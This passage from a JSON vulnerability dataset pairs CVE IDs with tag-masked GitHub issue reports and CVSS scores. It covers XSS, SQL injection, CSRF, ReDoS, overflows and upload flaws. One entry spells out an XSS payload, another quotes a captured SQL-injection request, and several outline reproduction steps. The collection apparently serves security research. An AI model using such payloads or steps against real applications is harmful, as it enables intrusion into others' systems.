  59132. "description": "APITAG Site Scripting (XSS). > APITAG Site Scripting (XSS) > > APITAG Site Scripting (XSS) allows clients to inject > arbitrary scripting code into application and have the server return > the script to the client in the response. This occurs because the > application is taking untrusted data and storing it without > performing any validation or output encoding. > > Reference: > FILETAG > > Steps to Reproduce: > > An example Proof Of Concept can be seen here: > URLTAG if user input is taken as a > content field (which could be the case where applications will be > using vis as a Dependency), this could result in a user injecting > malicious APITAG which is then rendered, unescaped, in other users' browsers. In the above > APITAG example, this is demonstrated by the insertion of<img > src='xxx' onerror='alert(/XSS/);' />. > > We wanted to know your opinion regarding this issue. I believe the > core issue here is URLTAG not validating or output encoding > user input before inserting it into the page. I also believe other vis modules are affected. But I > wanted to hear your opinion on whether you think this is a security > issue or not. Do let me know what you think. Thanks.",
  59133. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
  59134. "severity": "MEDIUM",
  59135. "baseScore": 6.8,
  59136. "impactScore": 4.7,
  59137. "exploitabilityScore": 2.1
  59138. },
  59139. {
  59140. "CVE_ID": "CVE-2020-28491",
  59141. "Issue_Url_old": "https://github.com/FasterXML/jackson-dataformats-binary/issues/186",
  59142. "Issue_Url_new": "https://github.com/fasterxml/jackson-dataformats-binary/issues/186",
  59143. "Repo_new": "fasterxml/jackson-dataformats-binary",
  59144. "Issue_Created_At": "2019-10-17T01:59:37Z",
  59145. "description": "[cbor] Unchecked stack allocation of byte buffer can cause ERRORTAG exception. APITAG APITAG accepts an unchecked field string length value discovered during parsing, and is used to size a stack allocated buffer. A malicious payload can be fabricated to exploit this and (at least) cause a ERRORTAG exception. ERRORTAG I am not sure how serious this is in java; because the JVM bounds checks memory, the practical impact is a denial of service (the parse aborts with an uncaught error) rather than memory corruption. With an unmanaged runtime this would be a critical security vulnerability. For example, the following CBOR data (discovered by a fuzzer) leads to len NUMBERTAG and triggers this exception on my laptop. APITAG This can probably be addressed by simple sanity checking of the len value (non negative, and capped at a sane maximum before the buffer is allocated). Also consider moving b to the heap if it does not create a performance issue.",
  59146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59147. "severity": "HIGH",
  59148. "baseScore": 7.5,
  59149. "impactScore": 3.6,
  59150. "exploitabilityScore": 3.9
  59151. },
  59152. {
  59153. "CVE_ID": "CVE-2020-28496",
  59154. "Issue_Url_old": "https://github.com/mrdoob/three.js/issues/21132",
  59155. "Issue_Url_new": "https://github.com/mrdoob/three.js/issues/21132",
  59156. "Repo_new": "mrdoob/three.js",
  59157. "Issue_Created_At": "2021-01-23T10:11:12Z",
  59158. "description": "APITAG in three. APITAG Hi, I would like to report a Regular Expression Denial of Service APITAG vulnerability in three. It allows an attacker to cause a denial of service when handling rgb or hsl colors, because a crafted color string makes the regex backtrack for a very long time. The vulnerable regex is located in URLTAG To Reproduce Steps to reproduce the behavior: Code ERRORTAG I am willing to suggest that you replace the regex APITAG with APITAG",
  59159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59160. "severity": "HIGH",
  59161. "baseScore": 7.5,
  59162. "impactScore": 3.6,
  59163. "exploitabilityScore": 3.9
  59164. },
  59165. {
  59166. "CVE_ID": "CVE-2020-28638",
  59167. "Issue_Url_old": "https://github.com/dyne/Tomb/issues/385",
  59168. "Issue_Url_new": "https://github.com/dyne/tomb/issues/385",
  59169. "Repo_new": "dyne/tomb",
  59170. "Issue_Created_At": "2020-11-03T12:21:20Z",
  59171. "description": "[security] Any password unlocks tomb when using pinentry curses on APITAG Thank you for this tool. I've been using it for a while, and I appreciate its straightforwardness. I recently noticed that my tomb unlocks no matter what password is provided. Steps to reproduce NUMBERTAG Use tomb with pinentry curses in the $PATH NUMBERTAG Run APITAG NUMBERTAG Provide any password for APITAG NUMBERTAG Provide any password for APITAG NUMBERTAG Provide any password for APITAG (!!!) My operating system is APITAG",
  59172. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59173. "severity": "CRITICAL",
  59174. "baseScore": 9.8,
  59175. "impactScore": 5.9,
  59176. "exploitabilityScore": 3.9
  59177. },
  59178. {
  59179. "CVE_ID": "CVE-2020-28693",
  59180. "Issue_Url_old": "https://github.com/ttimot24/HorizontCMS/issues/21",
  59181. "Issue_Url_new": "https://github.com/ttimot24/horizontcms/issues/21",
  59182. "Repo_new": "ttimot24/horizontcms",
  59183. "Issue_Created_At": "2020-11-05T06:43:07Z",
  59184. "description": "An unrestricted file upload through Themes upload function. The Themes upload function accepts a zip file and extracts its contents into the /themes/ directory, apparently without filtering the file types inside the archive. If an attacker uploads a zip file containing a malicious PHP file, they can then execute it by requesting URLTAG",
  59185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59186. "severity": "HIGH",
  59187. "baseScore": 8.8,
  59188. "impactScore": 5.9,
  59189. "exploitabilityScore": 2.8
  59190. },
  59191. {
  59192. "CVE_ID": "CVE-2020-28702",
  59193. "Issue_Url_old": "https://github.com/tomoya92/pybbs/issues/137",
  59194. "Issue_Url_new": "https://github.com/atjiu/pybbs/issues/137",
  59195. "Repo_new": "atjiu/pybbs",
  59196. "Issue_Created_At": "2020-11-05T05:58:18Z",
  59197. "description": "SQL injection vulnerability in version NUMBERTAG Official website of the manufacturer involved: URLTAG Source code download address: URLTAG Framework version NUMBERTAG Vulnerability type: SQL injection Vulnerability status: not fixed Vulnerability level: high Code analysis and vulnerability recurrence\uff1a As can be seen from screenshot below(see the upper left mark of Figure NUMBERTAG for the detailed code path), the \"$\" symbol (raw string substitution of the keyword into the query text, instead of a bound parameter) is used in the SQL statement in line NUMBERTAG of the code, resulting in a SQL injection vulnerability. From this SQL section, we trace back to the interface functions, and then we find that the SQL section is the topic query SQL of the user's main interface. FILETAG There is no filtering of the input on the front end, and the existence of the vulnerability can be verified manually. Start the project, log in the front end after registering users, create a new topic with the content of NUMBERTAG and the title of \"test\", and then enter NUMBERTAG in the search bar, and no data can be APITAG enter NUMBERTAG or NUMBERTAG including spaces) , proving that there is a SQL injection vulnerability. FILETAG FILETAG FILETAG Here is the result of sqlmap\uff1a FILETAG FILETAG Here is the packet content\uff1a FILETAG GET /search?keyword NUMBERTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Connection: close Referer: URLTAG Cookie: Idea NUMBERTAG cb NUMBERTAG cbcaa eb NUMBERTAG b NUMBERTAG f2fea NUMBERTAG b NUMBERTAG APITAG APITAG APITAG user_token=b8c NUMBERTAG e NUMBERTAG b7d bb NUMBERTAG e NUMBERTAG a0d0f NUMBERTAG Upgrade Insecure Requests NUMBERTAG",
  59198. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59199. "severity": "HIGH",
  59200. "baseScore": 7.5,
  59201. "impactScore": 3.6,
  59202. "exploitabilityScore": 3.9
  59203. },
  59204. {
  59205. "CVE_ID": "CVE-2020-28705",
  59206. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/576",
  59207. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/576",
  59208. "Repo_new": "daylightstudio/fuel-cms",
  59209. "Issue_Created_At": "2020-11-05T02:54:39Z",
  59210. "description": "FUEL CMS NUMBERTAG Cross site request forgery (CSRF) vulnerability. In PATHTAG Cross site request forgery (CSRF) vulnerability The attacker can use this vulnerability to delete arbitrary pages once a logged in administrator is lured into loading the attacker's page. APITAG POC CODETAG",
  59211. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  59212. "severity": "MEDIUM",
  59213. "baseScore": 4.3,
  59214. "impactScore": 1.4,
  59215. "exploitabilityScore": 2.8
  59216. },
  59217. {
  59218. "CVE_ID": "CVE-2020-28734",
  59219. "Issue_Url_old": "https://github.com/plone/Products.CMFPlone/issues/3209",
  59220. "Issue_Url_new": "https://github.com/plone/products.cmfplone/issues/3209",
  59221. "Repo_new": "plone/products.cmfplone",
  59222. "Issue_Created_At": "2020-11-10T09:41:27Z",
  59223. "description": "Security issues in the background. Hi, I found several security issues in the background, please pay attention to deal with it address: FILETAG",
  59224. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59225. "severity": "HIGH",
  59226. "baseScore": 8.8,
  59227. "impactScore": 5.9,
  59228. "exploitabilityScore": 2.8
  59229. },
  59230. {
  59231. "CVE_ID": "CVE-2020-28759",
  59232. "Issue_Url_old": "https://github.com/OAID/Tengine/issues/476",
  59233. "Issue_Url_new": "https://github.com/oaid/tengine/issues/476",
  59234. "Repo_new": "oaid/tengine",
  59235. "Issue_Created_At": "2020-11-11T07:31:30Z",
  59236. "description": "A buffer overflow is found in serializer. Vulnerability analysis We found that in the seriliazer module, there is a heap overflow problem Link\uff1a FILETAG The problem is in the APITAG function starting at line NUMBERTAG which calls the APITAG function at line NUMBERTAG img URLTAG The first parameter APITAG of the APITAG function points to the address space where the model file is located, and the second parameter is controlled by APITAG . For this project, the model is an input controlled by the user, so the parameters of APITAG can be controlled. img URLTAG img URLTAG Poc Download the official example model, and select the landmark model to demonstrate here. According to the official use case, the landmark model is run normally, and the program executes normally. img URLTAG Write NUMBERTAG bytes of garbage data to the header of the APITAG file, and then run the landmark model. Program routine error. img URLTAG Write NUMBERTAG bytes of garbage data to the header of the APITAG file, and then run the landmark model. program crash. img URLTAG EXP\uff1a CODETAG",
  59237. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59238. "severity": "MEDIUM",
  59239. "baseScore": 5.5,
  59240. "impactScore": 3.6,
  59241. "exploitabilityScore": 1.8
  59242. },
  59243. {
  59244. "CVE_ID": "CVE-2020-28846",
  59245. "Issue_Url_old": "https://github.com/wh1tes/wh1te_blog/issues/8",
  59246. "Issue_Url_new": "https://github.com/wh1tes/wh1te_blog/issues/8",
  59247. "Repo_new": "wh1tes/wh1te_blog",
  59248. "Issue_Created_At": "2020-11-12T09:43:53Z",
  59249. "description": "CSRF vulnerability exists in seacms NUMBERTAG CSRF vulnerability exists in seacms NUMBERTAG Github Url: URLTAG Official website: FILETAG Through code audit, we found that there is no CSRF protection on the add-account action in the administrator back end. The key code is in APITAG FILETAG By analysis, we can confirm that there is a vulnerability here. Check Point: We forged a web page FILETAG FILETAG CODETAG and entered some strings: FILETAG As a result, once a logged in administrator opens the forged page, a new user is added in the back end. FILETAG",
  59250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  59251. "severity": "MEDIUM",
  59252. "baseScore": 6.5,
  59253. "impactScore": 3.6,
  59254. "exploitabilityScore": 2.8
  59255. },
  59256. {
  59257. "CVE_ID": "CVE-2020-28847",
  59258. "Issue_Url_old": "https://github.com/xCss/Valine/issues/348",
  59259. "Issue_Url_new": "https://github.com/xcss/valine/issues/348",
  59260. "Repo_new": "xcss/valine",
  59261. "Issue_Created_At": "2020-11-11T14:00:20Z",
  59262. "description": "FILETAG [ ] APITAG Which versions of Valine, and which browser / OS are affected by this issue? Valine NUMBERTAG All systems and browsers",
  59263. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  59264. "severity": "MEDIUM",
  59265. "baseScore": 5.4,
  59266. "impactScore": 2.7,
  59267. "exploitabilityScore": 2.3
  59268. },
  59269. {
  59270. "CVE_ID": "CVE-2020-28851",
  59271. "Issue_Url_old": "https://github.com/golang/go/issues/42535",
  59272. "Issue_Url_new": "https://github.com/golang/go/issues/42535",
  59273. "Repo_new": "golang/go",
  59274. "Issue_Created_At": "2020-11-12T11:07:01Z",
  59275. "description": "text/language: panic in APITAG while parsing u extension. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GO NUMBERTAG MODULE=\"\" GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOINSECURE=\"\" PATHTAG GONOPROXY=\"\" GONOSUMDB=\"\" GOOS=\"linux\" PATHTAG GOPRIVATE=\"\" GOPROXY=\" URLTAG \" PATHTAG APITAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" AR=\"ar\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" PATHTAG version: go version APITAG linux/amd NUMBERTAG PATHTAG tool compile V: compile version APITAG uname sr: Linu NUMBERTAG microsoft standard Distributor ID: Kali Description: Kali APITAG Rolling Release NUMBERTAG Codename: kali rolling PATHTAG GNU C Library APITAG GLIBC NUMBERTAG stable release version NUMBERTAG gdb version: GNU gdb APITAG NUMBERTAG APITAG APITAG What did you do? APITAG URLTAG What did you expect to see? Error via return value What did you see instead? ERRORTAG",
  59276. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59277. "severity": "HIGH",
  59278. "baseScore": 7.5,
  59279. "impactScore": 3.6,
  59280. "exploitabilityScore": 3.9
  59281. },
  59282. {
  59283. "CVE_ID": "CVE-2020-28852",
  59284. "Issue_Url_old": "https://github.com/golang/go/issues/42536",
  59285. "Issue_Url_new": "https://github.com/golang/go/issues/42536",
  59286. "Repo_new": "golang/go",
  59287. "Issue_Created_At": "2020-11-12T11:12:42Z",
  59288. "description": "text/language: panic in APITAG while processing bcp NUMBERTAG tag. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GO NUMBERTAG MODULE=\"\" GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOINSECURE=\"\" PATHTAG GONOPROXY=\"\" GONOSUMDB=\"\" GOOS=\"linux\" PATHTAG GOPRIVATE=\"\" GOPROXY=\" URLTAG \" PATHTAG APITAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" AR=\"ar\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" PATHTAG version: go version APITAG linux/amd NUMBERTAG PATHTAG tool compile V: compile version APITAG uname sr: Linu NUMBERTAG microsoft standard Distributor ID: Kali Description: Kali APITAG Rolling Release NUMBERTAG Codename: kali rolling PATHTAG GNU C Library APITAG GLIBC NUMBERTAG stable release version NUMBERTAG gdb version: GNU gdb APITAG NUMBERTAG APITAG APITAG What did you do? APITAG URLTAG What did you expect to see? Error via return value What did you see instead? ERRORTAG",
  59289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59290. "severity": "HIGH",
  59291. "baseScore": 7.5,
  59292. "impactScore": 3.6,
  59293. "exploitabilityScore": 3.9
  59294. },
  59295. {
  59296. "CVE_ID": "CVE-2020-28865",
  59297. "Issue_Url_old": "https://github.com/KFCFans/PowerJob/issues/99",
  59298. "Issue_Url_new": "https://github.com/powerjob/powerjob/issues/99",
  59299. "Repo_new": "powerjob/powerjob",
  59300. "Issue_Created_At": "2020-11-13T13:59:47Z",
  59301. "description": "Arbitrary password modification vulnerability. APITAG password modification vulnerability\uff09 \u5b98\u65b9\u8bd5\u7528\u5730\u5740\uff1a URLTAG NUMBERTAG test NUMBERTAG test NUMBERTAG FILETAG FILETAG NUMBERTAG FILETAG \u4fee\u6539\u7528\u6237\u5bc6\u7801\uff1a FILETAG FILETAG \u4e0d\u5b58\u5728\u8eab\u4efd\u6821\u9a8c\u7b49\u51ed\u8bc1\uff0c\u76f4\u63a5\u53ef\u4ee5\u4fee\u6539\u7528\u6237test2\u7684\u5bc6\u7801 APITAG FILETAG \u6700\u540e\u767b\u5f55\u6210\u529f\uff1a FILETAG FILETAG",
  59302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  59303. "severity": "HIGH",
  59304. "baseScore": 7.5,
  59305. "impactScore": 3.6,
  59306. "exploitabilityScore": 3.9
  59307. },
  59308. {
  59309. "CVE_ID": "CVE-2020-28924",
  59310. "Issue_Url_old": "https://github.com/rclone/rclone/issues/4783",
  59311. "Issue_Url_new": "https://github.com/rclone/rclone/issues/4783",
  59312. "Repo_new": "rclone/rclone",
  59313. "Issue_Created_At": "2020-11-18T12:13:24Z",
  59314. "description": "Place holder issue for security issue. ...details to follow",
  59315. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59316. "severity": "HIGH",
  59317. "baseScore": 7.5,
  59318. "impactScore": 3.6,
  59319. "exploitabilityScore": 3.9
  59320. },
  59321. {
  59322. "CVE_ID": "CVE-2020-28948",
  59323. "Issue_Url_old": "https://github.com/pear/Archive_Tar/issues/33",
  59324. "Issue_Url_new": "https://github.com/pear/archive_tar/issues/33",
  59325. "Repo_new": "pear/archive_tar",
  59326. "Issue_Created_At": "2020-11-17T07:24:14Z",
  59327. "description": "Multiple vulnerabilities through filename manipulation. I have submitted this to the PEAR bug tracker as well as the PEAR group mailing list, and I'm not sure if either has gone through, so opening an issue here with the hope that this is the right place for it. While auditing a separate application which uses APITAG internally, I found that APITAG is vulnerable to object injection through Phar unserialization as well as to local file overwriting by crafting the 'filename' of a file in a tar archive. Phar unserialization There was a APITAG talk by Sam Thomas on exploiting PHP's Phar metadata unserialization behavior a couple of years ago, called \"It ERRORTAG APITAG ERRORTAG APITAG ERRORTAG PATHTAG ERRORTAG /etc/passwd or /etc/shadow ERRORTAG private function APITAG ERRORTAG PATHTAG APITAG scheme://`, it most likely is a malicious file. It would be great if you could fix and also request a CVE ID? Attachments: FILETAG",
  59328. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  59329. "severity": "HIGH",
  59330. "baseScore": 7.8,
  59331. "impactScore": 5.9,
  59332. "exploitabilityScore": 1.8
  59333. },
  59334. {
  59335. "CVE_ID": "CVE-2020-28954",
  59336. "Issue_Url_old": "https://github.com/bigbluebutton/bigbluebutton/issues/10818",
  59337. "Issue_Url_new": "https://github.com/bigbluebutton/bigbluebutton/issues/10818",
  59338. "Repo_new": "bigbluebutton/bigbluebutton",
  59339. "Issue_Created_At": "2020-11-13T05:57:59Z",
  59340. "description": "Join API should filter control characters from user's name. The join API is not filtering for control characters in user name. This can be a problem for some XML parsers.",
  59341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  59342. "severity": "MEDIUM",
  59343. "baseScore": 5.3,
  59344. "impactScore": 1.4,
  59345. "exploitabilityScore": 3.9
  59346. },
  59347. {
  59348. "CVE_ID": "CVE-2020-28975",
  59349. "Issue_Url_old": "https://github.com/scikit-learn/scikit-learn/issues/18891",
  59350. "Issue_Url_new": "https://github.com/scikit-learn/scikit-learn/issues/18891",
  59351. "Repo_new": "scikit-learn/scikit-learn",
  59352. "Issue_Created_At": "2020-11-21T14:40:29Z",
  59353. "description": "Segmentation fault on SVMLIB. Description: In Scikit learn version NUMBERTAG calling the APITAG method on a maliciously crafted SVM model can result in a segmentation fault. Such models can be introduced via pickle, json, or any other model persistence format (note that unpickling data from an untrusted source is already arbitrary code execution, so the segfault matters mostly for formats that are otherwise safe to load). The behaviour is triggered when one of the members of the _n_support array has a very large value, example NUMBERTAG when calling APITAG Tested environment: Ubuntu NUMBERTAG ubuntu NUMBERTAG Python NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG on linux Numpy version NUMBERTAG APITAG NUMBERTAG APITAG to Reproduce from sklearn import svm from sklearn import datasets if __name__ == '__main__': X,y = APITAG clf = APITAG APITAG y) APITAG NUMBERTAG y_pred = APITAG Expected Results not to fail Actual Results Segmentation fault, this is a debugger trace ERRORTAG Versions System: python NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG executable: PATHTAG machine: Linu NUMBERTAG generic NUMBERTAG with glibc NUMBERTAG Python dependencies: pip NUMBERTAG setuptools NUMBERTAG sklearn NUMBERTAG numpy NUMBERTAG scipy NUMBERTAG Cython: None pandas NUMBERTAG matplotlib NUMBERTAG joblib NUMBERTAG threadpoolctl NUMBERTAG Built with APITAG True",
  59354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59355. "severity": "HIGH",
  59356. "baseScore": 7.5,
  59357. "impactScore": 3.6,
  59358. "exploitabilityScore": 3.9
  59359. },
  59360. {
  59361. "CVE_ID": "CVE-2020-29069",
  59362. "Issue_Url_old": "https://github.com/pwnlandia/mhn/issues/799",
  59363. "Issue_Url_new": "https://github.com/pwnlandia/mhn/issues/799",
  59364. "Repo_new": "pwnlandia/mhn",
  59365. "Issue_Created_At": "2020-11-23T06:41:35Z",
  59366. "description": "Unknown IP can make the MHN web UI crash. One day my MHN Web page could not open although all services were running. I tried to find the reason, which is as follows. If an IP address is not in APITAG APITAG then the ISO country code lookup returns APITAG When the code is APITAG then MHN Web cannot generate the icon path and the page crashes. FILETAG Code: PATHTAG FILETAG In function \"_get_flag_ip_localdb\" at line NUMBERTAG the IP ISO code is returned when the lookup works, but if the IP has no record in APITAG APITAG it returns None. Next, line NUMBERTAG cannot call \"upper function\" on a None ISO code. If a page needs to show the country icon APITAG Dashboard, Attack APITAG then that page crashes. The crash log is in PATHTAG FILETAG My case \"IP NUMBERTAG FILETAG Now the error is logged in PATHTAG and the page renders correctly. FILETAG FILETAG So an attacker who connects to the honeypot from an IP address that is missing from the lookup database can perform a denial of service attack against the MHN web UI; the fix should treat a None country code as unknown instead of crashing.",
  59367. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  59368. "severity": "MEDIUM",
  59369. "baseScore": 5.5,
  59370. "impactScore": 3.6,
  59371. "exploitabilityScore": 1.8
  59372. },
  59373. {
  59374. "CVE_ID": "CVE-2020-29128",
  59375. "Issue_Url_old": "https://github.com/petl-developers/petl/issues/526",
  59376. "Issue_Url_new": "https://github.com/petl-developers/petl/issues/526",
  59377. "Repo_new": "petl-developers/petl",
  59378. "Issue_Created_At": "2020-10-02T03:56:32Z",
  59379. "description": "Security issue. Hello, I have a security issue to report. Can you please provide a contact to report it to or instructions on how to report it? Thanks!",
  59380. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59381. "severity": "CRITICAL",
  59382. "baseScore": 9.8,
  59383. "impactScore": 5.9,
  59384. "exploitabilityScore": 3.9
  59385. },
  59386. {
  59387. "CVE_ID": "CVE-2020-29203",
  59388. "Issue_Url_old": "https://github.com/armink/struct2json/issues/13",
  59389. "Issue_Url_new": "https://github.com/armink/struct2json/issues/13",
  59390. "Repo_new": "armink/struct2json",
  59391. "Issue_Created_At": "2020-11-18T09:05:39Z",
  59392. "description": "An unsafe operation is found in the S2J_STRUCT_GET_string_ELEMENT function. struct2json Vulnerability Analysis An unsafe operation is found in the ERRORTAG . The strcpy function is used to copy APITAG to the struct , which may cause overflow when APITAG is longer than structure defined array size. img URLTAG POC CODETAG Run: img URLTAG Suggestion Use strncpy instead of strcpy to bound the copy to the size of the destination array (note that strncpy does not NUL terminate when the source is at least as long as the limit, so copy at most size minus one bytes and write the terminator explicitly) \uff1a CODETAG After modification\uff1a img URLTAG",
  59393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59394. "severity": "CRITICAL",
  59395. "baseScore": 9.8,
  59396. "impactScore": 5.9,
  59397. "exploitabilityScore": 3.9
  59398. },
  59399. {
  59400. "CVE_ID": "CVE-2020-29204",
  59401. "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/2083",
  59402. "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/2083",
  59403. "Repo_new": "xuxueli/xxl-job",
  59404. "Issue_Created_At": "2020-11-18T09:38:37Z",
  59405. "description": "NUMBERTAG Add User Stored XSS vulnerabilities . Escape NUMBERTAG length limit. Please answer some questions before submitting your issue. Thanks! Which version of XXL JOB do you using NUMBERTAG Expected behavior Add User\u3002 Actual behavior Add User Stored XSS vulnerabilities . Escape NUMBERTAG length limit Steps to reproduce the behavior url\uff1a FILETAG FILETAG poc\uff1a APITAG FILETAG The page automatically loads and triggers XSS FILETAG FILETAG Other information Restoration suggestions\uff1a",
  59406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59407. "severity": "MEDIUM",
  59408. "baseScore": 6.1,
  59409. "impactScore": 2.7,
  59410. "exploitabilityScore": 2.8
  59411. },
  59412. {
  59413. "CVE_ID": "CVE-2020-29242",
  59414. "Issue_Url_old": "https://github.com/dhowden/tag/issues/77",
  59415. "Issue_Url_new": "https://github.com/dhowden/tag/issues/77",
  59416. "Repo_new": "dhowden/tag",
  59417. "Issue_Created_At": "2020-11-19T13:15:59Z",
  59418. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. Hello, I found several vulnerabilities in this repository; they could be used to cause a denial of service by decoding a malicious file. This is the first vulnerability in FILETAG . In the APITAG function, you don't check the size of the b parameter. If the size of b is zero or less than NUMBERTAG the program will panic on an out of bounds access. testcase FILETAG info ERRORTAG",
  59419. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59420. "severity": "MEDIUM",
  59421. "baseScore": 6.5,
  59422. "impactScore": 3.6,
  59423. "exploitabilityScore": 2.8
  59424. },
  59425. {
  59426. "CVE_ID": "CVE-2020-29243",
  59427. "Issue_Url_old": "https://github.com/dhowden/tag/issues/80",
  59428. "Issue_Url_new": "https://github.com/dhowden/tag/issues/80",
  59429. "Repo_new": "dhowden/tag",
  59430. "Issue_Created_At": "2020-11-19T13:44:09Z",
  59431. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the fourth vulnerability in FILETAG . In the APITAG function, you don't check the size of the b parameter. If the b parameter does not end with a double zero, the size of APITAG is one after APITAG and the program then panics because your bounds check in line NUMBERTAG comes too late, after the out of bounds access has already happened. testcase FILETAG ERRORTAG",
  59432. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59433. "severity": "MEDIUM",
  59434. "baseScore": 6.5,
  59435. "impactScore": 3.6,
  59436. "exploitabilityScore": 2.8
  59437. },
  59438. {
  59439. "CVE_ID": "CVE-2020-29244",
  59440. "Issue_Url_old": "https://github.com/dhowden/tag/issues/79",
  59441. "Issue_Url_new": "https://github.com/dhowden/tag/issues/79",
  59442. "Repo_new": "dhowden/tag",
  59443. "Issue_Created_At": "2020-11-19T13:29:16Z",
  59444. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the third vulnerability in FILETAG In the APITAG function, you don't check the size of b; the program will panic when the size of b is NUMBERTAG testcase FILETAG ERRORTAG",
  59445. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59446. "severity": "MEDIUM",
  59447. "baseScore": 6.5,
  59448. "impactScore": 3.6,
  59449. "exploitabilityScore": 2.8
  59450. },
  59451. {
  59452. "CVE_ID": "CVE-2020-29245",
  59453. "Issue_Url_old": "https://github.com/dhowden/tag/issues/78",
  59454. "Issue_Url_new": "https://github.com/dhowden/tag/issues/78",
  59455. "Repo_new": "dhowden/tag",
  59456. "Issue_Created_At": "2020-11-19T13:24:16Z",
  59457. "description": "some vulnerability NUMBERTAG an out of bound vulnerability in APITAG function. This is the second vulnerability in FILETAG . In the APITAG function, although you check the size of b, the program still panics when the size of b is NUMBERTAG because the existing check does not cover that case. testcase FILETAG ERRORTAG",
  59458. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  59459. "severity": "MEDIUM",
  59460. "baseScore": 6.5,
  59461. "impactScore": 3.6,
  59462. "exploitabilityScore": 2.8
  59463. },
  59464. {
  59465. "CVE_ID": "CVE-2020-29249",
  59466. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/2",
  59467. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/2",
